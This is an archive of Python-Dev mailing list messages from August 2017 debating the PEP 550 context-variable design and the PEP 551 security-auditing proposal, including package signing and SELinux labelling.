Ouch... it's hard enough to do a table in 80 characters. :(

Guess my first editing task is rewrapping everything...

Thanks (not really ;) ),
Steve

From v+python at g.nevcal.com Mon Aug 28 22:55:07 2017
From: v+python at g.nevcal.com (Glenn Linderman)
Date: Mon, 28 Aug 2017 19:55:07 -0700
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

On 8/28/2017 6:50 PM, Guido van Rossum wrote:
> FWIW we *could* have a policy that OS threads also inherit the lookup
> chain from their creator, but I doubt that's going to fly with
> backwards compatibility.

Since LC is new, how could such a policy affect backwards compatibility?
The obvious answer would be that some use cases that presently use other
mechanisms that "should" be ported to using LC would have to be careful in
how they do the port, but discussion seems to indicate that they would
have to be careful in how they do the port anyway.

One of the most common examples is the decimal context. IIUC, each thread
gets its initial decimal context from a global template, rather than
inheriting from its parent thread. Porting decimal context to LC then, in
the event of OS threads inheriting the lookup chain from their creator,
would take extra work for compatibility: setting the decimal context from
the global template (a step it must already take) rather than accepting
the inheritance. It might be appropriate that an updated version of
decimal that uses LC would offer the option of inheriting the decimal
context from the parent thread, or using the global template, as an
enhancement.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From yselivanov.ml at gmail.com Mon Aug 28 23:45:03 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Mon, 28 Aug 2017 23:45:03 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: 
Message-ID: 

On Mon, Aug 28, 2017 at 9:50 PM, Guido van Rossum wrote:
> On Mon, Aug 28, 2017 at 6:07 PM, Nathaniel Smith wrote:
>>
>> The important difference between generators/coroutines and normal
>> function calls is that with normal function calls, the link between
>> the caller and callee is fixed for the entire lifetime of the inner
>> frame, so there's no way for the context to shift under your feet. If
>> all we had were normal function calls, then (green-) thread locals
>> using the save/restore trick would be enough to handle all the use
>> cases above -- it's only for generators/coroutines where the
>> save/restore trick breaks down.
This means that pushing/popping LCs >> when crossing into/out of a generator frame is the minimum needed to >> get the desired semantics, and it keeps the LC stack small (important >> since lookups can be O(n) in the worst case), and it minimizes the >> backcompat breakage for operations like decimal.setcontext() where >> people *do* expect to call it in a subroutine and have the effects be >> visible in the caller. > > > I like this way of looking at things. Does this have any bearing on > asyncio.Task? To me those look more like threads than like generators. Or > possibly they should inherit the lookup chain from the point when the Task > was created, [..] We explain why tasks have to inherit the lookup chain from the point where they are created in the PEP (in the new High-level Specification section): https://www.python.org/dev/peps/pep-0550/#coroutines-and-asynchronous-tasks In short, without inheriting the chain we can't wrap coroutines into tasks (like wrapping an await in wait_for() would break the code, if we don't inherit the chain). In the latest version (v4) we made all coroutines to have their own Logical Context, which, as we discovered today, makes us unable to set context variables in __aenter__ coroutines. This will be fixed in the next version. > FWIW we *could* have a policy that OS threads also > inherit the lookup chain from their creator, but I doubt that's going to fly > with backwards compatibility. Backwards compatibility is indeed an issue. Inheriting the chain for threads would mean another difference between PEP 550 and 'threading.local()', that could cause backwards incompatible behaviour for decimal/numpy when they are updated to new APIs. For decimal, for example, we could use the following pattern to fallback to use the default decimal context for ECs (threads) that don't have it set: ctx = decimal_var.get(default=default_decimal_ctx) We can also add an 'initializer' keyword-argument to 'new_context_var' to specify a callable that will be used to give a default value to the var. Another issue, is that with the current C API, we can only inherit EC for threads started with 'threading.Thread'. There's no reliable way to inherit the chain if a thread was initialized by a C extension. IMO, inheriting the lookup chain in threads makes sense when we use them for pools, like concurrent.futures.ThreadPoolExecutor. When threads are used as long-running subprograms, inheriting the chain should be an opt-in. Yury From ncoghlan at gmail.com Tue Aug 29 05:01:03 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 29 Aug 2017 19:01:03 +1000 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On 27 August 2017 at 03:23, Yury Selivanov wrote: > On Sat, Aug 26, 2017 at 1:23 PM, Ethan Furman wrote: >> On 08/26/2017 09:25 AM, Yury Selivanov wrote: >>> ContextVar.lookup() method *traverses the stack* until it finds the LC >>> that has a value. "get()" does not reflect this subtle semantics >>> difference. >> >> A good point; however, ChainMap, which behaves similarly as far as lookup >> goes, uses "get" and does not have a "lookup" method. I think we lose more >> than we gain by changing that method name. > > ChainMap is constrained to be a Mapping-like object, but I get your > point. Let's see what others say about the "lookup()". It is kind of > an experiment to try a name and see if it fits. 
I don't think "we may want to add extra parameters" is a good reason to omit a conventional `get()` method - I think it's a reason to offer a separate API to handle use cases where the question of *where* the var is set matters (for example, `my_var.is_set()` would indicate whether or not `my_var.set()` has been called in the current logical context without requiring a parameter check for normal lookups that don't care). Cheers, Nick. P.S. And I say that as a reader who correctly guessed why you had changed the method name in the current iteration of the proposal. I'm sympathetic to those reasons, but I think sticking with the conventional API will make this one easier to learn and use :) -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 29 06:53:15 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 29 Aug 2017 20:53:15 +1000 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: On 28 August 2017 at 01:51, Jim J. Jewett wrote: > I think there is general consensus that this should go in a module other > than sys. (At least a submodule.) > > The specific names are still To Be Determined, but I suspect seeing the > functions and objects as part of a named module will affect what works. Given the refocusing of the PEP on the context variable API, with the other aspects introduced solely in service of making context variables work as defined, my current suggestion would be to make it a hybrid Python/C API using the "contextvars" + "_contextvars" naming convention. Then all most end user applications defining context variables would need is the single line: from contextvars import new_context_var _contextvars would contain the APIs that only the interpreter itself can implement, while contextvars would provide a home for any pure Python convenience APIs that could be shared across interpreter implementations. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 29 08:21:56 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 29 Aug 2017 22:21:56 +1000 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: Message-ID: On 29 August 2017 at 07:24, Yury Selivanov wrote: > This means that PEP 550 will have a caveat for async code: don't rely > on context propagation up the call stack, unless you are writing > __aenter__ and __aexit__ that are guaranteed to be called without > being wrapped into a Task. I'm not sure if it was Nathaniel or Stefan that raised it, but I liked the analogy that compared wrapping a coroutine in a new Task to submitting a synchronous function call to a concurrent.futures executor: while the dispatch layer is able to pass down a snapshot of the current execution context to the submitted function or wrapped coroutine, the potential for concurrent execution of multiple activities using that same context means the dispatcher *can't* reliably pass back any changes that the child context makes. 
For example, consider the following:

    def func():
        with make_executor() as executor:
            fut1 = executor.submit(other_func1)
            fut2 = executor.submit(other_func2)
            result1 = fut1.result()
            result2 = fut2.result()

    async def coro():
        fut1 = asyncio.ensure_future(other_coro1())
        fut2 = asyncio.ensure_future(other_coro2())
        result1 = await fut1
        result2 = await fut2

For both of these cases, it shouldn't matter which order we use to wait
for the results, or if we perform any other operations in between, and the
only way to be sure of that outcome is if the dispatch operations (whether
that's asyncio.ensure_future or executor.submit) prevent reverse
propagation of context changes from the operation being dispatched.

Cheers,
Nick.

-- 
Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia

From wes.turner at gmail.com Tue Aug 29 09:14:34 2017
From: wes.turner at gmail.com (Wes Turner)
Date: Tue, 29 Aug 2017 08:14:34 -0500
Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime
In-Reply-To: <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org>
References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org>
Message-ID: 

On Monday, August 28, 2017, Steve Dower wrote:

> On 28Aug2017 1834, Gregory P. Smith wrote:
>> My gut feeling says that there are N interpreters available on just
>> about every bloated system image out there. Multiple pythons are often
>> among them, other we do not control will also continue to exist. I
>> expect a small initial payload can be created that when executed will
>> binary patch the interpreter's memory to disable all auditing,
>> /potentially/ in a manner that cannot be audited itself (a challenge
>> guaranteed to be accepted).
>
> Repeating the three main goals listed by the PEP:
> * preventing malicious use is valuable
> * detecting malicious use is important
> * detecting attempts to bypass detection is critical
>
> This case falls under the last one. Yes, it is possible to patch the
> interpreter (at least in systems that don't block that - Windows
> certainly can prevent this at the kernel level), but in order to do so
> you should trigger at least one very unusual event (e.g. any of the
> ctypes ones).
>
> Compared to the current state, where someone can patch your interpreter
> without you ever being able to tell, it counts as a victory.
>
> And yeah, if you have alternative interpreters out there that are not
> auditing, you're in just as much trouble. There are certainly sysadmins
> who do a good job of controlling this though - these changes enable
> *those* sysadmins to do a better job, it doesn't help the ones who don't
> invest in it.
>
>> If the goal is to audit attacks and the above becomes the standard
>> attack payload boilerplate before existing "use python to pull down
>> 'fun' stuff to execute". It seems to negate the usefulness.
>
> You can audit all code before it executes and prevent it. Whether you
> use a local malware scanner or some sort of signature scan of log files
> doesn't matter, the change *enables* you to detect this behaviour. Right
> now it is impossible.

Wouldn't it be great to have the resources to source audit all code? (And
expect everyone to GPG sign all their commits someday.)

Many Linux packaging formats do have checksums of all files in a package:
{RPM, DEB,}

Python Wheel packages do have a manifest with SHA256 file checksums.
bdist_wheel.write_record():
https://bitbucket.org/pypa/wheel/src/5d49f8cf18679d1bc6f3e1e414a5df3a1e492644/wheel/bdist_wheel.py?at=default&fileviewer=file-view-default#bdist_wheel.py-436

Is there a tool for checking these manifest and file checksums and
signatures?

Which keys can sign for which packages? IIUC, any key loaded into the
local keyring is currently valid for any package?

"ENH: GPG signatures, branch-environment map (GitFS/HgFS workflow)"
https://github.com/saltstack/salt/issues/12183

- links to GPG signing support in hg, git, os packaging systems

...

Setting and checking SELinux file context labels:

Someone else can explain how DEB handles semanage and chcon?

https://fedoraproject.org/wiki/PackagingDrafts/SELinux

RPM supports .te (type enforcement), .fc (file context), and .if SELinux
files with an `semodule` command.

RPM requires various combinations of the policycoreutils,
selinux-policy-targeted, selinux-policy-devel, and policycoreutils-python
packages.

Should setup.py (running with set fcontext (eg root)) just call chcon
itself; or is it much better to repack (signed) Python packages as e.g.
RPMs?

FWIW, Salt and Ansible do support setting and checking SELinux file
contexts:

salt.modules.selinux:
https://docs.saltstack.com/en/latest/ref/modules/all/salt.modules.selinux.html
https://github.com/saltstack/salt/blob/develop/salt/modules/selinux.py

Requires:
- cmds: semanage, setsebool, semodule
- pkgs: policycoreutils, policycoreutils-python,

Ansible sefcontext:
http://docs.ansible.com/ansible/latest/sefcontext_module.html
https://github.com/ansible/ansible/blob/devel/lib/ansible/modules/system/sefcontext.py

Requires:
- pkgs: libselinux-python, policycoreutils-python

Does it make sense to require e.g. policycoreutils-python[-python] in
'spython'? ((1) Instead of wrapping `ls -Z` and `chcon` (2) in setup.py
(3) as root)?

>> This audit layer seems like a defense against existing exploit kits
>> rather than future ones.
>
> As a *defense*, yes, though if you use a safelist of your own code
> rather than a blocklist of malicious code, you can defend against all
> unexpected code. (For example, you could have a signed catalog of code
> on the machine that is used to verify all sources that are executed.
> Again - these features are for sysadmins who invest in this, it isn't
> free security for lazy ones.)
>
>> Is that still useful from a defense in depth
>> point of view?
>
> Detection is very useful for defense in depth. The new direction of
> malware scanners is heading towards behavioural detection (away from
> signature-based detection) because it's more future proof to detect
> unexpected actions than unexpected code.
>
> (If you think any of these explanations deserve to be in the PEP text
> itself, please let me know so I can add it in. Or if you don't like
> them, let me know that too and I'll try again!)
>
> Cheers,
> Steve
>
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: https://mail.python.org/mailman/options/python-dev/wes.turner%40gmail.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From yselivanov.ml at gmail.com Tue Aug 29 09:14:53 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 09:14:53 -0400
Subject: [Python-Dev] Pep 550 module
In-Reply-To: 
References: 
Message-ID: 

On Tue, Aug 29, 2017 at 6:53 AM, Nick Coghlan wrote:
> On 28 August 2017 at 01:51, Jim J.
Jewett wrote: >> I think there is general consensus that this should go in a module other >> than sys. (At least a submodule.) >> >> The specific names are still To Be Determined, but I suspect seeing the >> functions and objects as part of a named module will affect what works. > > Given the refocusing of the PEP on the context variable API, with the > other aspects introduced solely in service of making context variables > work as defined, my current suggestion would be to make it a hybrid > Python/C API using the "contextvars" + "_contextvars" naming > convention. > > Then all most end user applications defining context variables would > need is the single line: > > from contextvars import new_context_var I like it! +1 from me. Yury From yselivanov.ml at gmail.com Tue Aug 29 09:18:21 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 09:18:21 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On Tue, Aug 29, 2017 at 5:01 AM, Nick Coghlan wrote: [..] > P.S. And I say that as a reader who correctly guessed why you had > changed the method name in the current iteration of the proposal. I'm > sympathetic to those reasons, but I think sticking with the > conventional API will make this one easier to learn and use :) Yeah, I agree. We'll switch lookup -> get in the next iteration. Guido's parallel with getattr/setattr/delattr is also useful. getattr can also lookup the attribute in base classes, but we still call it "get". Yury From elprans at gmail.com Tue Aug 29 09:46:20 2017 From: elprans at gmail.com (Elvis Pranskevichus) Date: Tue, 29 Aug 2017 09:46:20 -0400 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: <2857548.zQZTC0OYsW@hammer.magicstack.net> On Tuesday, August 29, 2017 9:14:53 AM EDT Yury Selivanov wrote: > On Tue, Aug 29, 2017 at 6:53 AM, Nick Coghlan wrote: > > On 28 August 2017 at 01:51, Jim J. Jewett wrote: > >> I think there is general consensus that this should go in a module > >> other than sys. (At least a submodule.) > >> > >> The specific names are still To Be Determined, but I suspect seeing > >> the functions and objects as part of a named module will affect > >> what works.> > > Given the refocusing of the PEP on the context variable API, with > > the > > other aspects introduced solely in service of making context > > variables work as defined, my current suggestion would be to make > > it a hybrid Python/C API using the "contextvars" + "_contextvars" > > naming convention. > > > > Then all most end user applications defining context variables would > > > > need is the single line: > > from contextvars import new_context_var > > I like it! > > +1 from me. +1 From ncoghlan at gmail.com Tue Aug 29 10:22:35 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 30 Aug 2017 00:22:35 +1000 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On 29 August 2017 at 23:18, Yury Selivanov wrote: > On Tue, Aug 29, 2017 at 5:01 AM, Nick Coghlan wrote: > [..] >> P.S. And I say that as a reader who correctly guessed why you had >> changed the method name in the current iteration of the proposal. I'm >> sympathetic to those reasons, but I think sticking with the >> conventional API will make this one easier to learn and use :) > > Yeah, I agree. We'll switch lookup -> get in the next iteration. > > Guido's parallel with getattr/setattr/delattr is also useful. 
getattr
> can also lookup the attribute in base classes, but we still call it
> "get".

True, in many ways attribute inheritance is Python's original ChainMap
implementation :)

Cheers,
Nick.

-- 
Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia

From guido at python.org Tue Aug 29 10:47:16 2017
From: guido at python.org (Guido van Rossum)
Date: Tue, 29 Aug 2017 07:47:16 -0700
Subject: [Python-Dev] Pep 550 module
In-Reply-To: <2857548.zQZTC0OYsW@hammer.magicstack.net>
References: <2857548.zQZTC0OYsW@hammer.magicstack.net>
Message-ID: 

On Tue, Aug 29, 2017 at 6:46 AM, Elvis Pranskevichus wrote:
> On Tuesday, August 29, 2017 9:14:53 AM EDT Yury Selivanov wrote:
> > On Tue, Aug 29, 2017 at 6:53 AM, Nick Coghlan wrote:
> > > Given the refocusing of the PEP on the context variable API, with
> > > the other aspects introduced solely in service of making context
> > > variables work as defined, my current suggestion would be to make
> > > it a hybrid Python/C API using the "contextvars" + "_contextvars"
> > > naming convention.
> > >
> > > Then all most end user applications defining context variables would
> > > need is the single line:
> > > from contextvars import new_context_var
> >
> > I like it!
> >
> > +1 from me.
>
> +1

OK, but does it have to look like a factory function? Can't it look like a
class? E.g.

    from contextvars import ContextVar

    my_parameter = ContextVar()

    async def some_calculation():
        my_parameter.set(my_parameter.get() + 2)
        my_parameter.delete()

-- 
--Guido van Rossum (python.org/~guido)

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From steve.dower at python.org Tue Aug 29 11:01:37 2017
From: steve.dower at python.org (Steve Dower)
Date: Tue, 29 Aug 2017 08:01:37 -0700
Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime
In-Reply-To: 
References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org>
Message-ID: <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org>

On 29Aug2017 0614, Wes Turner wrote:
> Wouldn't it be great to have the resources to source audit all code?
> (And expect everyone to GPG sign all their commits someday.)
> > Setting and checking SELinux file context labels: > > Someone else can explain how DEB handles semanage and chcon? > > https://fedoraproject.org/wiki/PackagingDrafts/SELinux > > RPM supports .te (type enforcement), .fc (file context), and .if SELinux > files with an `semodule` command. > > RPM requires various combinations of the policycoreutils, > selinux-policy-targeted, selinux-policy-devel, and > ?policycoreutils-python packages. > > Should setup.py (running with set fcontext (eg root)) just call chcon > itself; or is it much better to repack (signed) Python packages as e.g. > RPMs? > > FWIW, Salt and Ansible do support setting and checking SELinux file > contexts: > salt.modules.selinux: > > https://docs.saltstack.com/en/latest/ref/modules/all/salt.modules.selinux.html > > https://github.com/saltstack/salt/blob/develop/salt/modules/selinux.py > > Requires: > - cmds: semanage, setsebool, semodule > - pkgs: policycoreutils, policycoreutils-python, > > > Ansible sefcontext: > > http://docs.ansible.com/ansible/latest/sefcontext_module.html > > https://github.com/ansible/ansible/blob/devel/lib/ansible/modules/system/sefcontext.py > > Requires: > - pkgs: libselinux-python, policycoreutils-python > > Does it make sense to require e.g. policycoreutils-python[-python] in > 'spython'? ((1) Instead of wrapping `ls -Z` and `chcon` (2) in setup.py > (3) as root)? From steve.dower at python.org Tue Aug 29 11:12:09 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 29 Aug 2017 08:12:09 -0700 Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime In-Reply-To: <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org> References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org> Message-ID: <8cefff0d-1471-749f-a36e-af3058dad97c@python.org> On 29Aug2017 0801, Steve Dower wrote: > On 29Aug2017 0614, Wes Turner wrote: >> Wouldn't it be great to have the resources to source audit all code? >> (And expect everyone to GPG sign all their commits someday.) > > If you care this much, then you will find the resources to audit all the > code manually after you've downloaded it and before you've deployed it > (or delegate that trust/liability elsewhere). Plenty of larger companies > do it, especially for their high value targets. On re-reading it wasn't entirely clear, so just to clarify: * above, "you" is meant as a generally inclusive term (i.e., not just Wes, unless Wes is also a sysadmin who is trying to carefully control his network :) ) * below, "you" is specifically the author of the email (i.e., Wes) Cheers, Steve > The rest of your email is highly platform-specific, and so while they > are potential *uses* of this PEP, and I hope people will take the time > to investigate them, they don't contribute to it in any way. None of > these things will be added to or required by the core CPython release. > > Cheers, > Steve > >> Many Linux packaging formats do have checksums of all files in a >> package: {RPM, DEB,} >> >> Python Wheel packages do have a manifest with SHA256 file checksums. >> bdist_wheel.write_record(): >> >> https://bitbucket.org/pypa/wheel/src/5d49f8cf18679d1bc6f3e1e414a5df3a1e492644/wheel/bdist_wheel.py?at=default&fileviewer=file-view-default#bdist_wheel.py-436 >> >> >> Is there a tool for checking these manifest and file checksums and >> signatures? >> >> Which keys can sign for which packages? 
From wes.turner at gmail.com  Tue Aug 29 12:04:19 2017
From: wes.turner at gmail.com (Wes Turner)
Date: Tue, 29 Aug 2017 11:04:19 -0500
Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime
In-Reply-To: <8cefff0d-1471-749f-a36e-af3058dad97c@python.org>
References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org> <8cefff0d-1471-749f-a36e-af3058dad97c@python.org>
Message-ID:

On Tuesday, August 29, 2017, Steve Dower wrote:
> On re-reading it wasn't entirely clear, so just to clarify:
>
> * above, "you" is meant as a generally inclusive term (i.e., not just
> Wes, unless Wes is also a sysadmin who is trying to carefully control
> his network :) )
>
> * below, "you" is specifically the author of the email (i.e., Wes)

avc: denied <[{/end>

Thanks!
> Cheers,
> Steve
>
> [...]
From yselivanov.ml at gmail.com  Tue Aug 29 13:16:50 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 13:16:50 -0400
Subject: [Python-Dev] Pep 550 module
In-Reply-To:
References: <2857548.zQZTC0OYsW@hammer.magicstack.net>
Message-ID:

On Tue, Aug 29, 2017 at 10:47 AM, Guido van Rossum wrote:
> [...]
>
> OK, but does it have to look like a factory function? Can't it look
> like a class? E.g.
>
>     from contextvars import ContextVar
>
>     my_parameter = ContextVar()
>
>     async def some_calculation():
>         my_parameter.set(my_parameter.get() + 2)
>
>     my_parameter.delete()

I initially designed the API to be part of the sys module, which
doesn't have any classes and has only functions.  Having a ContextVar
class exposed directly in the contextvars module makes sense.

We can also replace new_execution_context() and new_logical_context()
with contextvars.ExecutionContext() and contextvars.LogicalContext().

Yury
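To make the shape of the class-based API sketched above concrete, here
is a toy stand-in that can be run today: it mimics only the
set()/get()/delete() interface from Guido's snippet, is backed by plain
thread-local storage, and implements none of PEP 550's logical-context
semantics (the default-value parameter is an illustrative assumption,
not part of the proposal):

    import threading

    class ContextVar:
        """Toy emulation of the proposed contextvars.ContextVar interface."""

        def __init__(self, default=None):
            # NOTE: plain TLS storage; the real PEP 550 semantics for
            # generators, coroutines and tasks are not modelled here.
            self._storage = threading.local()
            self._default = default

        def get(self):
            return getattr(self._storage, 'value', self._default)

        def set(self, value):
            self._storage.value = value

        def delete(self):
            try:
                del self._storage.value
            except AttributeError:
                pass

    my_parameter = ContextVar(default=0)
    my_parameter.set(my_parameter.get() + 2)
    assert my_parameter.get() == 2
    my_parameter.delete()
    assert my_parameter.get() == 0

Where this toy and the proposal differ is exactly the subject of the
rest of this thread: how values behave across generators, coroutines
and tasks.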
From solipsis at pitrou.net  Tue Aug 29 14:40:21 2017
From: solipsis at pitrou.net (Antoine Pitrou)
Date: Tue, 29 Aug 2017 20:40:21 +0200
Subject: [Python-Dev] PEP 550 v4: coroutine policy
References:
Message-ID: <20170829204021.16934837@fsol>

On Mon, 28 Aug 2017 17:24:29 -0400
Yury Selivanov wrote:
> Long story short, I think we need to rollback our last decision to
> prohibit context propagation up the call stack in coroutines.  In PEP
> 550 v3 and earlier, the following snippet would work just fine:
>
>     var = new_context_var()
>
>     async def bar():
>         var.set(42)
>
>     async def foo():
>         await bar()
>         assert var.get() == 42  # with previous PEP 550 semantics
>
>     run_until_complete(foo())
>
> But it would break if a user wrapped "await bar()" with "wait_for()":
>
>     var = new_context_var()
>
>     async def bar():
>         var.set(42)
>
>     async def foo():
>         await wait_for(bar(), 1)
>         assert var.get() == 42  # AssertionError !!!
>
>     run_until_complete(foo())
[...]
> So I guess we have no other choice other than reverting this spec
> change for coroutines.  The very first example in this email should
> start working again.

What about the second one?  Why wouldn't the bar() coroutine inherit
the LC at the point it's instantiated (i.e. where the synchronous bar()
call is done)?

> This means that PEP 550 will have a caveat for async code: don't rely
> on context propagation up the call stack, unless you are writing
> __aenter__ and __aexit__ that are guaranteed to be called without
> being wrapped into a Task.

Hmm, sorry for being a bit slow, but I'm not sure what this sentence
implies.  How is the user supposed to know whether something will be
wrapped into a Task (short of being an expert in asyncio internals
perhaps)?

Actually, if you could whip up an example of what you mean here, it
would be helpful I think :-)

> Thus I propose to stop associating PEP 550 concepts with
> (dynamic) scoping.

Agreed that dynamic scoping is a red herring here.

Regards

Antoine.

From yselivanov.ml at gmail.com  Tue Aug 29 14:49:18 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 14:49:18 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz>
Message-ID:

On Mon, Aug 28, 2017 at 7:16 PM, Yury Selivanov wrote:
> On Mon, Aug 28, 2017 at 6:56 PM, Greg Ewing wrote:
>> Yury Selivanov wrote:
>>> I'm saying that the following should not work:
>>>
>>>     def nested_gen():
>>>         set_some_context()
>>>         yield
>>>
>>>     def gen():
>>>         # some_context is not set
>>>         yield from nested_gen()
>>>         # use some_context ???
>>
>> And I'm saying it *should* work, otherwise it breaks
>> one of the fundamental principles on which yield-from
>> is based, namely that 'yield from foo()' should behave
>> as far as possible as a generator equivalent of a
>> plain function call.
>
> Consider the following generator:
>
>     def gen():
>         with decimal.context(...):
>             yield
>
> We don't want gen's context to leak to the outer scope -- that's one
> of the reasons why PEP 550 exists.  Even if we do this:
>
>     g = gen()
>     next(g)
>     # the decimal.context won't leak out of gen
>
> So a Python user would have a mental model: context set in generators
> doesn't leak.
>
> Now, let's consider a "broken" generator:
>
>     def gen():
>         decimal.context(...)
>         yield
>
> If we iterate gen() with next(), it still won't leak its context.  But
> if "yield from" has the semantics that you want -- "yield from" to be
> just like a function call -- then calling
>
>     yield from gen()
>
> will corrupt the context of the caller.
>
> I simply want consistency.  It's easier for everybody to say that
> generators never leaked their context changes to the outer scope,
> rather than saying that "generators can sometimes leak their context".

Adding to the above: there's a fundamental reason why we can't make
"yield from" transparent for EC modifications.

While we want "yield from" to have semantics close to a function call,
in some situations we simply can't.  Because you can manually iterate a
generator and then 'yield from' it, you can have this weird
'partial-function-call' semantics.  For example:

    var = new_context_var()

    def gen():
        var.set(42)
        yield
        yield

Now, we can partially iterate the generator (1):

    def main():
        g = gen()
        next(g)
        # we don't want 'g' to leak its EC changes,
        # so var.get() is None here.
        assert var.get() is None

and then we can "yield from" it (2):

    def main():
        g = gen()
        next(g)
        # we don't want 'g' to leak its EC changes,
        # so var.get() is None here.
        assert var.get() is None

        yield from g
        # at this point it's too late for us to let var leak into
        # main().__logical_context__

For (1) we want the context change to be isolated.  For (2) you say
that the context change should propagate to the caller.  But it's
impossible: 'g' already has its own LC({var: 42}), and we can't merge
it with the LC of "main()".

"await" is fundamentally different, because it's not possible to
partially iterate the coroutine before awaiting it (asyncio will break
if you call "coro.send(None)" manually).

Yury
From yselivanov.ml at gmail.com  Tue Aug 29 15:18:09 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 15:18:09 -0400
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To: <20170829204021.16934837@fsol>
References: <20170829204021.16934837@fsol>
Message-ID:

On Tue, Aug 29, 2017 at 2:40 PM, Antoine Pitrou wrote:
> On Mon, 28 Aug 2017 17:24:29 -0400
> Yury Selivanov wrote:
>> [...]
>>
>> So I guess we have no other choice other than reverting this spec
>> change for coroutines.  The very first example in this email should
>> start working again.
>
> What about the second one?

Just to be clear: in the next revision of the PEP, the first example
will work without an AssertionError; the second example will keep
raising an AssertionError.

> Why wouldn't the bar() coroutine inherit
> the LC at the point it's instantiated (i.e. where the synchronous bar()
> call is done)?

We want tasks to have their own isolated contexts.  When a task is
started, it runs its code in parallel with its "parent" task.  We want
each task to have its own isolated EC (OS thread/TLS vs async task/EC
analogy), otherwise the EC of "foo()" will be randomly changed by the
tasks it spawned.

wait_for() in the above example creates an asyncio.Task implicitly, and
that's why we don't see 'var' changed to '42' in foo().

This is a slightly complicated case, but it's addressable with good
documentation and recommended best practices.

> Actually, if you could whip up an example of what you mean here, it
> would be helpful I think :-)

__aenter__ won't ever be wrapped in a task because it's called by the
interpreter.

    var = new_context_var()

    class MyAsyncCM:

        def __aenter__(self):
            var.set(42)

    async with MyAsyncCM():
        assert var.get() == 42

The above snippet will always work as expected.

We'll update the PEP with a thorough explanation of all these nuances
in the semantics.

Yury
From antoine at python.org  Tue Aug 29 15:32:35 2017
From: antoine at python.org (Antoine Pitrou)
Date: Tue, 29 Aug 2017 21:32:35 +0200
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To:
References: <20170829204021.16934837@fsol>
Message-ID:

On 29/08/2017 at 21:18, Yury Selivanov wrote:
> On Tue, Aug 29, 2017 at 2:40 PM, Antoine Pitrou wrote:
>> Why wouldn't the bar() coroutine inherit
>> the LC at the point it's instantiated (i.e. where the synchronous bar()
>> call is done)?
>
> We want tasks to have their own isolated contexts.  When a task
> is started, it runs its code in parallel with its "parent" task.

I'm sorry, but I don't understand what it all means.

To pose the question differently: why is example #1 supposed to be
different, philosophically, than example #2?  Both spawn a coroutine,
both wait for its execution to end.  There is no reason that adding a
wait_for() intermediary (presumably because the user wants to add a
timeout) would significantly change the execution semantics of bar().

> wait_for() in the above example creates an asyncio.Task implicitly,
> and that's why we don't see 'var' changed to '42' in foo().

I don't understand why a non-obvious behaviour detail (the fact that
wait_for() creates an asyncio.Task implicitly) should translate into a
fundamental difference in observable behaviour.  I find it
counter-intuitive and error-prone.

> This is a slightly complicated case, but it's addressable with good
> documentation and recommended best practices.

It would be better addressed with consistent behaviour that doesn't
rely on specialist knowledge, though :-/

> __aenter__ won't ever be wrapped in a task because it's called by the
> interpreter.
>
> [...]
>
> The above snippet will always work as expected.

Uh... So I really don't understand what you meant above when you wrote:

"""
